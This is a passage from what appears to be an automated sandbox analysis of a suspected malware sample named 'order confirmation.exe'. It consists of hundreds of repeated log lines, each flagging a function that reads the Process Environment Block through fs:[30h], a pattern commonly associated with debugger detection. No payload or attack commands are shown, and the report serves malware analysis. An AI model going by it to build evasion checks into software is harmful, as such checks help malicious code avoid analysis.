                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DE53E mov eax, dword ptr fs:[00000030h]4_2_013DE53E
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DE53E mov eax, dword ptr fs:[00000030h]4_2_013DE53E
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DE53E mov eax, dword ptr fs:[00000030h]4_2_013DE53E
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C0535 mov eax, dword ptr fs:[00000030h]4_2_013C0535
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C0535 mov eax, dword ptr fs:[00000030h]4_2_013C0535
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C0535 mov eax, dword ptr fs:[00000030h]4_2_013C0535
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C0535 mov eax, dword ptr fs:[00000030h]4_2_013C0535
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C0535 mov eax, dword ptr fs:[00000030h]4_2_013C0535
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C0535 mov eax, dword ptr fs:[00000030h]4_2_013C0535
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01446500 mov eax, dword ptr fs:[00000030h]4_2_01446500
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01484500 mov eax, dword ptr fs:[00000030h]4_2_01484500
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01484500 mov eax, dword ptr fs:[00000030h]4_2_01484500
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01484500 mov eax, dword ptr fs:[00000030h]4_2_01484500
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01484500 mov eax, dword ptr fs:[00000030h]4_2_01484500
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01484500 mov eax, dword ptr fs:[00000030h]4_2_01484500
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01484500 mov eax, dword ptr fs:[00000030h]4_2_01484500
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01484500 mov eax, dword ptr fs:[00000030h]4_2_01484500
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013E656A mov eax, dword ptr fs:[00000030h]4_2_013E656A
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013E656A mov eax, dword ptr fs:[00000030h]4_2_013E656A
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013E656A mov eax, dword ptr fs:[00000030h]4_2_013E656A
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B8550 mov eax, dword ptr fs:[00000030h]4_2_013B8550
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B8550 mov eax, dword ptr fs:[00000030h]4_2_013B8550
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013D45B1 mov eax, dword ptr fs:[00000030h]4_2_013D45B1
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013D45B1 mov eax, dword ptr fs:[00000030h]4_2_013D45B1
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EE59C mov eax, dword ptr fs:[00000030h]4_2_013EE59C
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013E4588 mov eax, dword ptr fs:[00000030h]4_2_013E4588
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B2582 mov eax, dword ptr fs:[00000030h]4_2_013B2582
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B2582 mov ecx, dword ptr fs:[00000030h]4_2_013B2582
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EC5ED mov eax, dword ptr fs:[00000030h]4_2_013EC5ED
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EC5ED mov eax, dword ptr fs:[00000030h]4_2_013EC5ED
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DE5E7 mov eax, dword ptr fs:[00000030h]4_2_013DE5E7
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DE5E7 mov eax, dword ptr fs:[00000030h]4_2_013DE5E7
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DE5E7 mov eax, dword ptr fs:[00000030h]4_2_013DE5E7
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DE5E7 mov eax, dword ptr fs:[00000030h]4_2_013DE5E7
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DE5E7 mov eax, dword ptr fs:[00000030h]4_2_013DE5E7
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DE5E7 mov eax, dword ptr fs:[00000030h]4_2_013DE5E7
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DE5E7 mov eax, dword ptr fs:[00000030h]4_2_013DE5E7
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DE5E7 mov eax, dword ptr fs:[00000030h]4_2_013DE5E7
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B25E0 mov eax, dword ptr fs:[00000030h]4_2_013B25E0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014305A7 mov eax, dword ptr fs:[00000030h]4_2_014305A7
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014305A7 mov eax, dword ptr fs:[00000030h]4_2_014305A7
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014305A7 mov eax, dword ptr fs:[00000030h]4_2_014305A7
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B65D0 mov eax, dword ptr fs:[00000030h]4_2_013B65D0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EA5D0 mov eax, dword ptr fs:[00000030h]4_2_013EA5D0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EA5D0 mov eax, dword ptr fs:[00000030h]4_2_013EA5D0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EE5CF mov eax, dword ptr fs:[00000030h]4_2_013EE5CF
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EE5CF mov eax, dword ptr fs:[00000030h]4_2_013EE5CF
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EA430 mov eax, dword ptr fs:[00000030h]4_2_013EA430
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0146A456 mov eax, dword ptr fs:[00000030h]4_2_0146A456
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013AE420 mov eax, dword ptr fs:[00000030h]4_2_013AE420
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013AE420 mov eax, dword ptr fs:[00000030h]4_2_013AE420
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013AE420 mov eax, dword ptr fs:[00000030h]4_2_013AE420
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013AC427 mov eax, dword ptr fs:[00000030h]4_2_013AC427
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0143C460 mov ecx, dword ptr fs:[00000030h]4_2_0143C460
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013E8402 mov eax, dword ptr fs:[00000030h]4_2_013E8402
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013E8402 mov eax, dword ptr fs:[00000030h]4_2_013E8402
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013E8402 mov eax, dword ptr fs:[00000030h]4_2_013E8402
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DA470 mov eax, dword ptr fs:[00000030h]4_2_013DA470
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DA470 mov eax, dword ptr fs:[00000030h]4_2_013DA470
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DA470 mov eax, dword ptr fs:[00000030h]4_2_013DA470
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01436420 mov eax, dword ptr fs:[00000030h]4_2_01436420
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01436420 mov eax, dword ptr fs:[00000030h]4_2_01436420
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01436420 mov eax, dword ptr fs:[00000030h]4_2_01436420
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01436420 mov eax, dword ptr fs:[00000030h]4_2_01436420
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01436420 mov eax, dword ptr fs:[00000030h]4_2_01436420
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01436420 mov eax, dword ptr fs:[00000030h]4_2_01436420
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01436420 mov eax, dword ptr fs:[00000030h]4_2_01436420
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013A645D mov eax, dword ptr fs:[00000030h]4_2_013A645D
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013D245A mov eax, dword ptr fs:[00000030h]4_2_013D245A
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EE443 mov eax, dword ptr fs:[00000030h]4_2_013EE443
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EE443 mov eax, dword ptr fs:[00000030h]4_2_013EE443
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EE443 mov eax, dword ptr fs:[00000030h]4_2_013EE443
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EE443 mov eax, dword ptr fs:[00000030h]4_2_013EE443
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EE443 mov eax, dword ptr fs:[00000030h]4_2_013EE443
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EE443 mov eax, dword ptr fs:[00000030h]4_2_013EE443
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EE443 mov eax, dword ptr fs:[00000030h]4_2_013EE443
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EE443 mov eax, dword ptr fs:[00000030h]4_2_013EE443
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013E44B0 mov ecx, dword ptr fs:[00000030h]4_2_013E44B0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B64AB mov eax, dword ptr fs:[00000030h]4_2_013B64AB
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0146A49A mov eax, dword ptr fs:[00000030h]4_2_0146A49A
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B04E5 mov ecx, dword ptr fs:[00000030h]4_2_013B04E5
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0143A4B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013E273C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013E273C mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013E273C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01434755 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013EC720 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013EC720 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0143E75D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B0710 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013E0710 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013EC700 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B8770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C0770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C0770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C0770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C0770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C0770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C0770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C0770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C0770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C0770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C0770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C0770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C0770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B0750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0142C730 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013E674D mov esi, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013E674D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013E674D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_014307C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B07AF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0143E7E1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B47FB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B47FB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0145678E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013D27ED mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013D27ED mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013D27ED mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_014647A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013BC7C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B262C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013CE627 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013E6620 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013E8620 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F2619 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0147866E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0147866E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C260B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C260B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C260B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C260B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C260B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C260B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C260B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013E2674 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0142E609 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013EA660 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013EA660 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013CC640 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013E66B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013EC6A6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B4690 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B4690 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0142E6F2 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0142E6F2 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0142E6F2 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0142E6F2 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_014306F1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_014306F1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013EA6C7 mov ebx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013EA6C7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01430946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013A8918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013A8918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01454978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01454978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0143C97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0142E908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0142E908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0143C912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013D6962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013D6962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013D6962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0143892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0144892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_014469C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0147A9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B09AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B09AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C29A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C29A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C29A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C29A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C29A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C29A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C29A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C29A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C29A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C29A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C29A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C29A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C29A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0143E9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013E29F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013E29F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013BA9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013BA9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013BA9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013BA9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013BA9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013BA9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013E49D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_014389B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_014389B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_014389B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013D2835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013D2835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013D2835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013D2835 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013D2835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013D2835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013EA830 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0143E872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0143E872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01446870 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01446870 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0143C810 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B4859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B4859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013E0854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C2840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0145483A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0145483A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0147A8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B0887 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013EC8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013EC8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0143C89D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013DE8C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01446B40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01446B40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0147AB40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01458B42 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01464B4B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01464B4B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0145EB50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013DEB20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013DEB20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013ACB7E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0142EB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0142EB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0142EB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0142EB1D mov eax, dword ptr fs:[00000030h]
